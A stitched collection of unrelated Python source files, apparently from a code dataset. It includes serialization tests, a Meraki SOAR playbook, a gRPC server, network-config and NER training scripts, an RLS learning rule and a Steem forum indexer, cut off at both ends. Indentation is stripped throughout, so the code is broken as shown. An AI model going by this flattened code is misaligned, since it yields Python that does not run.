x.decode(b"\x00\x00\x00\x01\x00\x00\x00\x02", ">")
assert x.value[0].x == 1
assert x.value[1].x == 2
def test_fixed_array_with_enum():
class E(prophy.with_metaclass(prophy.enum_generator, prophy.enum)):
_enumerators = [("E_1", 1),
("E_2", 2),
("E_3", 3)]
class A(prophy.with_metaclass(prophy.struct_generator, prophy.struct)):
_descriptor = [("a", prophy.array(E, size=3))]
x = A()
x.encode(">")
def test_fixed_array_decode_exception():
class A(prophy.with_metaclass(prophy.struct_generator, prophy.struct_packed)):
_descriptor = [("a_len", prophy.u8),
("a", prophy.array(prophy.u8, bound="a_len", size=3))]
with pytest.raises(Exception, match="A: too few bytes to decode array"):
A().decode(b"\x00", ">")
def test_fixed_array_decode_size_over_255():
class X(prophy.with_metaclass(prophy.struct_generator, prophy.struct)):
_descriptor = [("x", prophy.array(prophy.u8, size=300))]
x = X()
x.decode(b'\x01' * 300, '<')
assert len(x.x) == 300
def test_fixed_array_decode_multiple_scalar_arrays():
class X(prophy.with_metaclass(prophy.struct_generator, prophy.struct)):
_descriptor = [('x', prophy.array(prophy.u8, size=1)),
('y', prophy.array(prophy.u8, size=1)),
('z', prophy.array(prophy.u8, size=1))]
x = X()
x.decode(b'\x00\x00\x00', '<')
def test_fixed_array_decode_multiple_composite_arrays():
class Y(prophy.with_metaclass(prophy.struct_generator, prophy.struct)):
_descriptor = [('x', prophy.u8)]
class X(prophy.with_metaclass(prophy.struct_generator, prophy.struct)):
_descriptor = [('x', prophy.array(Y, size=1)),
('y', prophy.array(Y, size=1)),
('z', prophy.array(Y, size=1))]
x = X()
x.decode(b'\x00\x00\x00', '<')
|
486634
|
import phantom.rules as phantom
import json
#
# Meraki sample playbook
#
# Copyright (c) 2016 World Wide Technology, Inc.
# All rights reserved.
#
# author: <NAME>, World Wide Technology
#
#
def locate_device_cb(action, success, container, results, handle):
if not success:
return
paths = ['action_result.data.*.client.mac',
'action_result.data.*.client.description',
'action_result.data.*.device',
'action_result.data.*.network',
'action_result.data.*.organization']
data = phantom.collect(results, paths)
phantom.debug(data)
return
def on_start(container):
parameters = []
parameters.append({
"search_string": "d8:30:62:8f:33:b7",
"timespan": "600",
})
phantom.act("locate device", parameters=parameters, assets=["meraki dashboard"], callback=locate_device_cb)
return
def on_finish(container, summary):
# This function is called after all actions are completed.
# Summary and/or action results can be collected here.
summary_json = phantom.get_summary()
summary_results = summary_json['result']
for result in summary_results:
action_run_id = result['id']
action_results = phantom.get_action_results(action_run_id=action_run_id)
return
|
486639
|
import argparse
import multiprocessing
from purerpc.server import Server
from generated.greeter_pb2 import HelloReply
from generated.greeter_grpc import GreeterServicer
"""
def configure_logs(log_file=None):
conf = {
"version": 1,
"formatters": {
"simple": {
"format": "[%(asctime)s - %(name)s - %(levelname)s]: %(message)s"
},
},
"handlers": {
"console": {
"class": "logging.StreamHandler",
"level": "WARNING",
"formatter": "simple",
"stream": "ext://sys.stdout",
}
},
"root": {
"level": "WARNING",
"handlers": ["console"],
},
"disable_existing_loggers": False
}
if log_file is not None:
conf["handlers"]["file"] = {
"class": "logging.FileHandler",
"level": "DEBUG",
"formatter": "simple",
"filename": log_file,
}
conf["root"]["handlers"].append("file")
logging.config.dictConfig(conf)
configure_logs()
"""
class Greeter(GreeterServicer):
async def SayHello(self, message):
return HelloReply(message="Hello, " + message.name)
async def SayHelloToMany(self, input_messages):
async for _ in input_messages:
pass
yield HelloReply(message="Hello, world!")
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--num_processes", default=0, type=int)
args = parser.parse_args()
if args.num_processes == 0:
num_processes = multiprocessing.cpu_count()
else:
num_processes = args.num_processes
server = Server(50055, num_processes=num_processes)
server.add_service(Greeter().service)
server.serve()
|
486643
|
import click
from nornir import InitNornir
from nornir.core.filter import F
from nornir_utils.plugins.functions import print_result
from nornir_scrapli.tasks import send_configs as scrapli_send_configs
# from nornir_napalm.plugins.tasks import napalm_configure
# from nornir_netmiko.tasks import netmiko_send_config
import ipaddress
from constants import config_file
import os
def get_env_vars(ctx, args, incomplete):
return [k for k in os.environ.keys() if incomplete in k]
def interfaces_config(task):
interfaces_cms = []
interfaces = task.host["interfaces"]
for name, interface in interfaces.items():
cm = f"interface {name}"
interfaces_cms.append(cm)
if "lo" not in name.lower():
interfaces_cms.append("no shut")
interface = ipaddress.IPv4Interface(interface)
cm = f"ip address {interface.ip} {interface.network.netmask}"
interfaces_cms.append(cm)
if task.host.platform == "cisco_xr":
interfaces_cms.append("commit")
# task.run(netmiko_send_config, config_commands=interfaces_cms)
task.run(scrapli_send_configs, configs=interfaces_cms)
# task.run(napalm_configure, configuration=interfaces_cms, replace=False)
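# For reference, interfaces_config assumes each host in hosts.yaml carries an "interfaces"
# mapping of interface name to an address in CIDR notation, e.g. (illustrative layout only):
#
#   R1:
#     data:
#       interfaces:
#         GigabitEthernet0/0: 10.0.12.1/24
#         Loopback0: 1.1.1.1/32
#
# ipaddress.IPv4Interface() then yields the address and netmask used in the generated commands.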
@click.group(name="interfaces")
def cli_interfaces():
"""Command for interfaces configuration"""
pass
@cli_interfaces.command(
name="configure",
help="Configure the Interfaces from the dictionary defined in hosts.yaml",
)
# @click.argument("device2", type=click.STRING, autocompletion=get_env_vars)
@click.option(
"--device",
help="Configure only the device",
required=False,
autocompletion=get_env_vars,
)
@click.option(
"--group", help="Configure all devices belong to the group", required=False
)
def run_interfaces_config(device, group):
# config_file = os.environ.get('NORNIR_CONFIG_FILE')
# os.chdir('../')
# os.getcwd()
# breakpoint()
nr = InitNornir(config_file=f"{config_file}")
if device:
nr = nr.filter(name=f"{device}")
if group:
nr = nr.filter(F(groups__contains=f"{group}"))
result = nr.run(task=interfaces_config)
print_result(result)
|
486675
|
class Solution(object):
def uniquePathsWithObstacles(self, grid):
"""
:type grid: List[List[int]]
:rtype: int
"""
if not grid:
return 0
if grid[0][0] == 1:
return 0
dp = [[0] * len(grid[0]) for _ in range(0, len(grid))]
dp[0][0] = 1 if grid[0][0] == 0 else 0
for i in range(1, len(grid)):
if grid[i][0] == 0:
dp[i][0] = 1
else:
break
for j in range(1, len(grid[0])):
if grid[0][j] == 0:
dp[0][j] = 1
else:
break
for i in range(1, len(grid)):
for j in range(1, len(grid[0])):
if grid[i][j] == 1:
dp[i][j] = 0
else:
dp[i][j] = dp[i - 1][j] + dp[i][j - 1]
return dp[-1][-1]
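# Quick illustration (not part of the original solution): a 3x3 grid with one obstacle in
# the centre leaves exactly two monotone paths from the top-left to the bottom-right corner.
#
#   Solution().uniquePathsWithObstacles([[0, 0, 0],
#                                        [0, 1, 0],
#                                        [0, 0, 0]])  # -> 2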
|
486679
|
import graphlab as gl
def extract_entities(sf, entities):
'''
Extract entities (nodes or edges) from graph data retrieved from a
JSON file created by Neo4j.
Args:
sf: The SFrame containing the 'data' column extracted from a JSON file
created by Neo4j.
entities: The entities to extract from sf. Can be 'nodes' or
'relationships'.
Returns:
SFrame of given entities
'''
sf[entities] = sf['data'].apply(lambda data: data['graph'][entities])
entities_sf = sf[[entities]].stack(entities, new_column_name=entities)
entities_sf = entities_sf.unpack(entities, column_name_prefix='')
entities_sf = entities_sf.unpack('properties', column_name_prefix='')
return entities_sf
def get_sgraph_from_neo4j_json(json_filename):
'''
Reads a JSON file, created by Neo4j, into an SGraph.
Args:
json_filename: The name of the JSON file created by Neo4j.
Returns:
SGraph
'''
# Load json_filename into an SFrame
sf = gl.SFrame.read_csv(json_filename, header=False,
column_type_hints=dict, verbose=False)
# Extract the graph data from sf
sf = sf.unpack('X1', column_name_prefix='')
sf = sf[['data']].stack('data', new_column_name='data')
# Extract nodes and edges
nodes_sf = extract_entities(sf, 'nodes')
edges_sf = extract_entities(sf, 'relationships')
# Create the SGraph
sgraph = gl.SGraph()
sgraph = sgraph.add_edges(edges_sf, src_field='startNode',
dst_field='endNode')
sgraph = sgraph.add_vertices(nodes_sf, vid_field='id')
return sgraph
g = get_sgraph_from_neo4j_json(
'https://static.turi.com/datasets/how-to/movies.json')
print g
# SGraph({'num_edges': 20L, 'num_vertices': 12L})
|
486681
|
class CGXFormatter:
def __init__(self):
self.BASE_INDENT = 4
self.inside_string = False
self.total_indent = 0
self.new_line = True
self.nb_lines = 0
def read_lines(self):
self.nb_lines = int(input())
for _ in range(self.nb_lines):
line = input()
for character in line:
self.read_char(character)
def read_char(self, character: str):
if self.inside_string:
if character == '\'':
self.inside_string = False
self.print_char(character)
else:
self.read_char_outside_string(character)
def read_char_outside_string(self, character: str):
if character == ' ' or character == '\t':
return
if character == '\'':
self.inside_string = True
self.print_char(character)
elif character == '(':
if not self.new_line:
self.print_new_line()
self.print_char(character)
self.print_new_line()
self.total_indent += self.BASE_INDENT
elif character == ')':
self.total_indent -= self.BASE_INDENT
if not self.new_line:
self.print_new_line()
self.print_char(character)
elif character == ';':
self.print_char(character)
self.print_new_line()
else:
self.print_char(character)
def print_char(self, character: str):
if self.new_line:
for _ in range(self.total_indent):
print(' ', end='')
self.new_line = False
print(character, end='')
def print_new_line(self):
print()
self.new_line = True
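# Example of the intended behaviour (illustrative). Given the two raw lines
#   ( '0'
#   )
# (preceded by the line count "2"), the formatter prints:
#   (
#       '0'
#   )
# Brackets get their own lines, block contents are indented by BASE_INDENT spaces, and
# quoted strings are copied verbatim.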
if __name__ == "__main__":
formatter = CGXFormatter()
formatter.read_lines()
|
486688
|
from __future__ import print_function
import xlsxwriter
"""
MIT License
Copyright (c) 2018 <NAME>, <NAME>
Please share comments and questions at:
https://github.com/PythonForensics/Learning-Python-for-Forensics
or email <EMAIL>
Permission is hereby granted, free of charge, to any person
obtaining a copy of this software and associated documentation
files (the "Software"), to deal in the Software without
restriction, including without limitation the rights to use,
copy, modify, merge, publish, distribute, sublicense, and/or
sell copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following
conditions:
The above copyright notice and this permission notice shall be
included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
OTHER DEALINGS IN THE SOFTWARE.
"""
ALPHABET = [chr(i) for i in range(ord('A'), ord('Z') + 1)]
def writer(output, headers, output_data, **kwargs):
"""
The writer function writes excel output for the framework
:param output: the output filename for the excel spreadsheet
:param headers: the name of the spreadsheet columns
:param output_data: the data to be written to the excel
spreadsheet
:return: Nothing
"""
wb = xlsxwriter.Workbook(output)
if headers is None:
print('[-] Received empty headers... \n'
'[-] Skipping writing output.')
return
if len(headers) <= 26:
title_length = ALPHABET[len(headers) - 1]
else:
title_length = 'Z'
ws = add_worksheet(wb, title_length)
if 'recursion' in kwargs.keys():
for i, data in enumerate(output_data):
if i > 0:
ws = add_worksheet(wb, title_length)
cell_length = len(data)
tmp = []
for dictionary in data:
tmp.append(
[str(dictionary[x]) if x in dictionary.keys() else '' for x in headers]
)
ws.add_table(
'A3:' + title_length + str(3 + cell_length),
{'data': tmp,
'columns': [{'header': x} for x in headers]})
else:
cell_length = len(output_data)
tmp = []
for data in output_data:
tmp.append([str(data[x]) if x in data.keys() else '' for x in headers])
ws.add_table(
'A3:' + title_length + str(3 + cell_length),
{'data': tmp,
'columns': [{'header': x} for x in headers]})
wb.close()
def add_worksheet(wb, length, name=None):
"""
The add_worksheet function creates a new formatted worksheet
in the workbook
:param wb: The workbook object
:param length: The range of rows to merge
:param name: The name of the worksheet
:return: ws, the worksheet
"""
title_format = wb.add_format({'bold': True,
'font_color': 'black', 'bg_color': 'white', 'font_size': 30,
'font_name': 'Arial', 'align': 'center'})
ws = wb.add_worksheet(name)
ws.merge_range('A1:' + length + '1', 'XYZ Corp',
title_format)
ws.merge_range('A2:' + length + '2', 'Case ####',
title_format)
return ws
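# A minimal, hypothetical usage sketch of the writer() entry point above; the file name,
# headers and rows are illustrative only. Keys missing from a row become empty cells.
def _example_report(output='report.xlsx'):
    headers = ['File Name', 'File Size', 'MD5']
    rows = [
        {'File Name': 'a.txt', 'File Size': 10, 'MD5': 'd41d8cd98f00b204e9800998ecf8427e'},
        {'File Name': 'b.txt', 'File Size': 20},
    ]
    writer(output, headers, rows)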
|
486722
|
import numpy as np
from nengo.builder import Builder, Operator, Signal
from nengo.builder.operator import Reset
from nengo.learning_rules import LearningRuleType
from nengo.synapses import SynapseParam, Lowpass
from nengo.version import version_info
__all__ = ['RLS']
class RLS(LearningRuleType):
"""Recursive least-squares rule for online decoder optimization.
This may be used to learn the weights on a :class:`nengo.Connection`,
online, in an L2-optimal manner. To be applied in the same scenarios as
:class:`nengo.PES`, to minimize some error signal.
In the end, the only real difference between RLS learning and using the
:class:`nengo.solvers.LstsqL2` solver, is *when* the learning takes
place. In the former case, the weights are learned online from an error
signal over time, whereas in the latter case, the weights are learned
offline in a batch optimization from the provided training data
(``eval_points`` and ``function``).
The cost of RLS is :math:`\\mathcal{O}\\left(n^2\\right)` extra
time and memory. It is typically much more efficient to do the learning
offline using the :class:`nengo.solvers.LstsqL2` solver.
Parameters
----------
learning_rate : ``float``, optional
Effective learning rate. This is better understood as
:math:`\\frac{1}{\\alpha}`, where :math:`\\alpha` is an
L2-regularization term. A large learning rate means little
regularization, which implies quick over-fitting. A small learning
rate means large regularization, which translates to slower
learning. Defaults to 1.0. [#]_
pre_synapse : :class:`nengo.synapses.Synapse`, optional
Filter applied to the pre-synaptic neural activities, for the
purpose of applying the weight update.
Defaults to a :class:`nengo.Lowpass` filter with a time-constant of
5 ms.
See Also
--------
:class:`nengo.PES`
:class:`nengo.solvers.LstsqL2`
:class:`.Temporal`
Notes
-----
RLS works by maintaining the inverse neural correlation matrix,
:math:`\\Gamma^{-1}`, where :math:`\\Gamma = A^T A + \\alpha I` are the
regularized correlations, :math:`A` is a matrix of (possibly filtered)
neural activities, and :math:`\\alpha` is an L2-regularization term
controlled by the ``learning_rate``. This matrix is used to project the
error signal and update the weights to be L2-optimal, at each time-step.
The time-step does not play a role in this learning rule, apart from
determining the time-scale over which the ``pre_synapse`` is discretized.
A complete learning update is applied on every time-step.
Attributes that can be probed from this learning rule:
``pre_filtered``, ``error``, ``delta``, ``inv_gamma``.
References
----------
.. [#] <NAME>., & <NAME>. (2009). Generating coherent patterns
of activity from chaotic neural networks. Neuron, 63(4), 544-557.
Examples
--------
See :doc:`notebooks/examples/full_force_learning` for an example of how to
use RLS to learn spiking FORCE [1]_ and "full-FORCE" networks in Nengo.
Below, we compare :class:`nengo.PES` against :class:`.RLS`, learning a
feed-forward communication channel (identity function), online,
and starting with 100 spiking LIF neurons from scratch (zero weights).
A faster learning rate for :class:`nengo.PES` results in over-fitting to
the most recent online example, while a slower learning rate does not
learn quickly enough. This is a general problem with greedy optimization.
:class:`.RLS` performs better since it is L2-optimal.
>>> from nengolib import RLS, Network
>>> import nengo
>>> from nengo import PES
>>> tau = 0.005
>>> learning_rules = (PES(learning_rate=1e-3, pre_tau=tau),
>>> RLS(learning_rate=1e-5, pre_synapse=tau))
>>> with Network() as model:
>>> u = nengo.Node(output=lambda t: np.sin(2*np.pi*t))
>>> probes = []
>>> for lr in learning_rules:
>>> e = nengo.Node(size_in=1,
>>> output=lambda t, e: e if t < 1 else 0)
>>> x = nengo.Ensemble(100, 1, seed=0)
>>> y = nengo.Node(size_in=1)
>>>
>>> nengo.Connection(u, e, synapse=None, transform=-1)
>>> nengo.Connection(u, x, synapse=None)
>>> conn = nengo.Connection(
>>> x, y, synapse=None, learning_rule_type=lr,
>>> function=lambda _: 0)
>>> nengo.Connection(y, e, synapse=None)
>>> nengo.Connection(e, conn.learning_rule, synapse=tau)
>>> probes.append(nengo.Probe(y, synapse=tau))
>>> probes.append(nengo.Probe(u, synapse=tau))
>>> with nengo.Simulator(model) as sim:
>>> sim.run(2.0)
>>> import matplotlib.pyplot as plt
>>> plt.plot(sim.trange(), sim.data[probes[0]],
>>> label=str(learning_rules[0]))
>>> plt.plot(sim.trange(), sim.data[probes[1]],
>>> label=str(learning_rules[1]))
>>> plt.plot(sim.trange(), sim.data[probes[2]],
>>> label="Ideal", linestyle='--')
>>> plt.vlines([1], -1, 1, label="Training -> Testing")
>>> plt.ylim(-2, 2)
>>> plt.legend(loc='upper right')
>>> plt.xlabel("Time (s)")
>>> plt.show()
"""
modifies = 'decoders'
probeable = ('pre_filtered', 'error', 'delta', 'inv_gamma')
pre_synapse = SynapseParam('pre_synapse', readonly=True)
def __init__(self, learning_rate=1.0, pre_synapse=Lowpass(tau=0.005)):
if version_info >= (2, 4, 1):
# https://github.com/nengo/nengo/pull/1310
super(RLS, self).__init__(learning_rate, size_in='post_state')
else: # pragma: no cover
self.error_type = 'decoded'
super(RLS, self).__init__(learning_rate)
self.pre_synapse = pre_synapse
def __repr__(self):
return "%s(learning_rate=%r, pre_synapse=%r)" % (
type(self).__name__, self.learning_rate, self.pre_synapse)
class SimRLS(Operator):
"""Nengo backend operator responsible for simulating RLS."""
def __init__(self, pre_filtered, error, delta, inv_gamma, tag=None):
super(SimRLS, self).__init__(tag=tag)
self.sets = []
self.incs = []
self.reads = [pre_filtered, error]
self.updates = [delta, inv_gamma]
@property
def delta(self):
return self.updates[0]
@property
def inv_gamma(self):
return self.updates[1]
@property
def pre_filtered(self):
return self.reads[0]
@property
def error(self):
return self.reads[1]
def _descstr(self):
return 'pre=%s > %s' % (self.pre_filtered, self.delta)
def make_step(self, signals, dt, rng):
r = signals[self.pre_filtered]
delta = signals[self.delta]
error = signals[self.error]
P = signals[self.inv_gamma]
def step_simrls():
# Note: dt is not used in learning rule
rP = r.T.dot(P)
P[...] -= np.outer(P.dot(r), rP) / (1 + rP.dot(r))
delta[...] = -np.outer(error, P.dot(r))
return step_simrls
@Builder.register(RLS)
def build_rls(model, rls, rule):
conn = rule.connection
pre_activities = model.sig[conn.pre_obj]['out']
pre_filtered = (pre_activities
if rls.pre_synapse is None
else model.build(rls.pre_synapse, pre_activities))
# Create input error signal
error = Signal(np.zeros(rule.size_in), name="RLS:error")
model.add_op(Reset(error))
model.sig[rule]['in'] = error
# Create signal for running estimate of inverse correlation matrix
assert pre_filtered.ndim == 1
n_neurons = pre_filtered.shape[0]
inv_gamma = Signal(np.eye(n_neurons) * rls.learning_rate,
name="RLS:inv_gamma")
model.add_op(SimRLS(pre_filtered=pre_filtered,
error=error,
delta=model.sig[rule]['delta'],
inv_gamma=inv_gamma))
# expose these for probes
model.sig[rule]['pre_filtered'] = pre_filtered
model.sig[rule]['error'] = error
model.sig[rule]['inv_gamma'] = inv_gamma
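# A minimal NumPy-only sketch (added for illustration; it is not part of the Nengo build
# machinery and all names below are invented) of the same recursive least-squares update
# that SimRLS.make_step performs: P tracks the inverse regularized correlation matrix and
# the decoders are nudged toward the L2-optimal solution on every step.
def _rls_toy_example(n_neurons=10, n_steps=200, learning_rate=1.0, seed=0):
    rng = np.random.RandomState(seed)
    target_decoders = rng.randn(n_neurons)   # ground-truth weights to recover
    decoders = np.zeros(n_neurons)           # weights being learned online
    P = np.eye(n_neurons) * learning_rate    # inverse correlation estimate (gamma^-1)
    for _ in range(n_steps):
        r = rng.randn(n_neurons)             # stand-in for the filtered activities
        error = decoders.dot(r) - target_decoders.dot(r)
        rP = r.dot(P)
        P -= np.outer(P.dot(r), rP) / (1.0 + rP.dot(r))
        decoders -= error * P.dot(r)         # same update as delta = -outer(error, P.dot(r))
    return np.abs(decoders - target_decoders).max()  # shrinks toward zero as learning converges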
|
486728
|
import time
import torch
import random
import numpy as np
from modules.optimizer import Optimizer
from model.seq_ner import SeqNERModel
from config.conf import args_config, data_config
from utils.dataset import DataLoader
from utils.datautil_seq import load_data, create_vocab, batch_variable, extract_ner_span
import torch.nn.utils as nn_utils
from logger.logger import logger
class Trainer(object):
def __init__(self, args, data_config):
self.args = args
self.data_config = data_config
genre = args.genre
self.train_set, self.val_set, self.test_set = self.build_dataset(data_config, genre)
# self.vocabs = self.build_vocabs(data_config[genre]['train'],
# data_config['pretrain']['word_embedding'],
# data_config['pretrain']['bert_vocab'])
self.vocabs = self.build_vocabs(self.train_set+self.val_set+self.test_set,
data_config['pretrain']['word_embedding'],
data_config['pretrain']['bert_vocab'])
self.model = SeqNERModel(num_wds=len(self.vocabs['word']),
num_chars=len(self.vocabs['char']),
num_tags=len(self.vocabs['tag']),
wd_embed_dim=args.wd_embed_dim,
char_embed_dim=args.char_embed_dim,
tag_embed_dim=args.tag_embed_dim,
bert_embed_dim=args.bert_embed_dim,
hidden_size=args.hidden_size,
num_rnn_layer=args.rnn_depth,
num_lbl=len(self.vocabs['ner']),
dropout=args.dropout,
bert_path=data_config['pretrain']['bert_model'],
num_bert_layer=args.bert_layers,
embed_weight=self.vocabs['word'].embeddings).to(args.device)
print(self.model)
total_params = sum(p.numel() for p in self.model.parameters() if p.requires_grad)
print("Training %d trainable parameters..." % total_params)
def build_dataset(self, data_config, genre='conll_2003'):
train_set = load_data(data_config[genre]['train'])
val_set = load_data(data_config[genre]['dev'])
test_set = load_data(data_config[genre]['test'])
print('train data size:', len(train_set))
print('validate data size:', len(val_set))
print('test data size:', len(test_set))
return train_set, val_set, test_set
'''
def build_vocabs(self, train_data_path, embed_file=None, bert_vocab_path=None):
vocabs = create_vocab(train_data_path, embed_file, bert_vocab_path)
# save_to(self.args.vocab_chkp, vocabs)
return vocabs
'''
def build_vocabs(self, datasets, embed_file=None, bert_vocab_path=None):
vocabs = create_vocab(datasets, embed_file, bert_vocab_path)
# save_to(self.args.vocab_chkp, vocabs)
return vocabs
def calc_train_acc(self, pred_score, gold_tags, mask=None):
'''
:param pred_score: (b, t, nb_tag)
:param gold_tags: (b, t)
:param mask: (b, t) 1 for valid tokens, 0 for padding
:return:
'''
pred_tags = pred_score.data.argmax(dim=-1)
nb_right = ((pred_tags == gold_tags) * mask).sum().item()
nb_total = mask.sum().item()
return nb_right, nb_total
# BIO eval
def eval_bio_acc(self, pred_tag_ids, gold_tag_ids, mask, ner_vocab, return_prf=False):
'''
:param pred_tag_ids: (b, t)
:param gold_tag_ids: (b, t)
:param mask: (b, t) 0 for padding
:return:
'''
seq_lens = mask.sum(dim=1).tolist()
nb_right, nb_pred, nb_gold = 0, 0, 0
for i, l in enumerate(seq_lens):
pred_tags = ner_vocab.idx2inst(pred_tag_ids[i][:l].tolist())
gold_tags = ner_vocab.idx2inst(gold_tag_ids[i][:l].tolist())
pred_ner_spans = set(extract_ner_span(pred_tags))
gold_ner_spans = set(extract_ner_span(gold_tags))
nb_pred += len(pred_ner_spans)
nb_gold += len(gold_ner_spans)
nb_right += len(pred_ner_spans & gold_ner_spans)
if return_prf:
return self.calc_prf(nb_right, nb_pred, nb_gold)
else:
return nb_right, nb_pred, nb_gold
# BIOES eval
def eval_bioes_acc(self, pred, target, mask, ner_vocab, return_prf=False):
pred = pred.masked_select(mask).tolist()
target = target.masked_select(mask).tolist()
assert len(pred) == len(target)
nb_right, nb_gold, nb_pred = 0, 0, 0
# Count the total number of entities in the predicted tags
entity_type = None
valid = False
for p in pred:
_type = ner_vocab.idx2inst(p)
if 'S-' in _type:
nb_pred += 1
valid = False
elif 'B-' in _type:
entity_type = _type.split('-')[1]
valid = True
elif 'I-' in _type:
if entity_type != _type.split('-')[1]:
valid = False
elif 'E-' in _type:
if entity_type == _type.split('-')[1] and valid:
nb_pred += 1
valid = False
# Count the total entities in the gold tags and how many of them were predicted correctly
begin = False
for i, (t, p) in enumerate(zip(target, pred)):
_type = ner_vocab.idx2inst(t)
if 'S-' in _type:
nb_gold += 1
if t == p:
nb_right += 1
elif 'B-' in _type:
if t == p:
begin = True
elif 'I-' in _type:
if t != p:
begin = False
elif 'E-' in _type:
nb_gold += 1
if t == p and begin:
nb_right += 1
begin = False
if return_prf:
return self.calc_prf(nb_right, nb_pred, nb_gold)
else:
return nb_right, nb_pred, nb_gold
def calc_prf(self, nb_right, nb_pred, nb_gold):
p = nb_right / (nb_pred + 1e-30)
r = nb_right / (nb_gold + 1e-30)
f = (2 * nb_right) / (nb_gold + nb_pred + 1e-30)
return p, r, f
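# Worked example for calc_prf (illustrative): nb_right=8, nb_pred=10, nb_gold=16 gives
# precision 0.8, recall 0.5 and F1 = 2*8 / (16+10), i.e. about 0.615.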
def train_eval(self):
train_loader = DataLoader(self.train_set, batch_size=self.args.batch_size, shuffle=True)
self.args.max_step = self.args.epoch * (len(train_loader) // self.args.update_step)
print('max step:', self.args.max_step)
optimizer = Optimizer(filter(lambda p: p.requires_grad, self.model.parameters()), self.args)
best_dev_metric, best_test_metric = dict(), dict()
patient = 0
for ep in range(1, 1+self.args.epoch):
train_loss = 0.
self.model.train()
t1 = time.time()
train_right, train_total = 0, 0
for i, batcher in enumerate(train_loader):
batch = batch_variable(batcher, self.vocabs)
batch.to_device(self.args.device)
pred_score = self.model(batch.wd_ids, batch.ch_ids, batch.tag_ids, batch.bert_inps)
mask = batch.wd_ids.gt(0)
loss = self.model.tag_loss(pred_score, batch.ner_ids, mask)
loss_val = loss.data.item()
train_loss += loss_val
nb_right, nb_total = self.calc_train_acc(pred_score, batch.ner_ids, mask)
train_right += nb_right
train_total += nb_total
if self.args.update_step > 1:
loss = loss / self.args.update_step
loss.backward()
if (i + 1) % self.args.update_step == 0 or (i == self.args.max_step - 1):
nn_utils.clip_grad_norm_(filter(lambda p: p.requires_grad, self.model.parameters()),
max_norm=self.args.grad_clip)
optimizer.step()
self.model.zero_grad()
logger.info('[Epoch %d] Iter%d time cost: %.2fs, lr: %.6f, train loss: %.3f, ACC: %.3f' % (
ep, i + 1, (time.time() - t1), optimizer.get_lr(), loss_val, train_right/train_total))
dev_metric = self.evaluate('dev')
if dev_metric['f'] > best_dev_metric.get('f', 0):
best_dev_metric = dev_metric
test_metric = self.evaluate('test')
if test_metric['f'] > best_test_metric.get('f', 0):
# check_point = {'model': self.model.state_dict(), 'settings': args}
# torch.save(check_point, self.args.model_chkp)
best_test_metric = test_metric
patient = 0
else:
patient += 1
logger.info('[Epoch %d] train loss: %.4f, lr: %f, patient: %d, dev_metric: %s, test_metric: %s' % (
ep, train_loss, optimizer.get_lr(), patient, best_dev_metric, best_test_metric))
# if patient >= (self.args.patient // 2 + 1):  # decay lr if dev performance has not improved for several epochs
# optimizer.lr_decay(0.95)
if patient >= self.args.patient: # early stopping
break
logger.info('Final Metric: %s' % best_test_metric)
def evaluate(self, mode='test'):
if mode == 'dev':
test_loader = DataLoader(self.val_set, batch_size=self.args.test_batch_size)
elif mode == 'test':
test_loader = DataLoader(self.test_set, batch_size=self.args.test_batch_size)
else:
raise ValueError('Invalid Mode!!!')
self.model.eval()
nb_right_all, nb_pred_all, nb_gold_all = 0, 0, 0
with torch.no_grad():
for i, batcher in enumerate(test_loader):
batch = batch_variable(batcher, self.vocabs)
batch.to_device(self.args.device)
pred_score = self.model(batch.wd_ids, batch.ch_ids, batch.tag_ids, batch.bert_inps)
mask = batch.wd_ids.gt(0)
pred_tag_ids = self.model.tag_decode(pred_score, mask)
# nb_right, nb_pred, nb_gold = self.eval_bio_acc(pred_tag_ids, batch.ner_ids, mask, self.vocabs['ner'])
nb_right, nb_pred, nb_gold = self.eval_bioes_acc(pred_tag_ids, batch.ner_ids, mask, self.vocabs['ner'])
nb_right_all += nb_right
nb_pred_all += nb_pred
nb_gold_all += nb_gold
p, r, f = self.calc_prf(nb_right_all, nb_pred_all, nb_gold_all)
return dict(p=p, r=r, f=f)
if __name__ == '__main__':
random.seed(1347)
np.random.seed(2343)
torch.manual_seed(1453)
torch.cuda.manual_seed(1347)
torch.cuda.manual_seed_all(1453)
print('cuda available:', torch.cuda.is_available())
print('cuDNN available:', torch.backends.cudnn.enabled)
print('gpu numbers:', torch.cuda.device_count())
args = args_config()
if torch.cuda.is_available() and args.cuda >= 0:
args.device = torch.device('cuda', args.cuda)
torch.cuda.empty_cache()
else:
args.device = torch.device('cpu')
data_path = data_config('./config/data_path.json')
trainer = Trainer(args, data_path)
trainer.train_eval()
|
486750
|
from datetime import datetime, timedelta
from steem import Steem
from pymongo import MongoClient
from pprint import pprint
import collections
import json
import time
import sys
import os
# Connections
nodes = [
'https://steemd.steemit.com'
]
s = Steem(nodes)
mongo = MongoClient("mongodb://mongo")
db = mongo.forums
data = json.loads(sys.argv[1])
def update_forum(data):
update = {
'$set': data,
'$unset': {
'children': 1
}
}
if 'parent' in data:
parent = db.forums.find_one({'_id': data['parent']})
update['$set'].update({
'parent_name': parent['name']
})
else:
data.pop('parent', None)
data.pop('parent_name', None)
update['$unset'].update({
'parent': True,
'parent_name': True,
})
query = {
'_id': data['_id']
}
results = db.forums.update(query, update, upsert=True)
if results['n'] == 1 and results['updatedExisting'] == False:
pprint("[FORUM][REINDEXER] - Inserting new forum [" + data['_id'] + "]")
if results['n'] == 1 and results['updatedExisting'] == True:
pprint("[FORUM][REINDEXER] - Updating forum [" + data['_id'] + "]")
def update_posts(data):
query = {}
if 'tags' in data and len(data['tags']) > 0:
query.update({'category': {'$in': data['tags']}})
if 'accounts' in data and len(data['accounts']) > 0:
query.update({'author': {'$in': data['accounts']}})
sort = [("last_reply",-1),("created",-1)]
results = db.posts.find(query).sort(sort).limit(1)
for comment in results:
query = {
'_id': data['_id'],
}
updates = {
'updated': comment['created'],
'last_post': {
'created': comment['created'],
'author': comment['author'],
'title': comment['title'],
'url': comment['url']
}
}
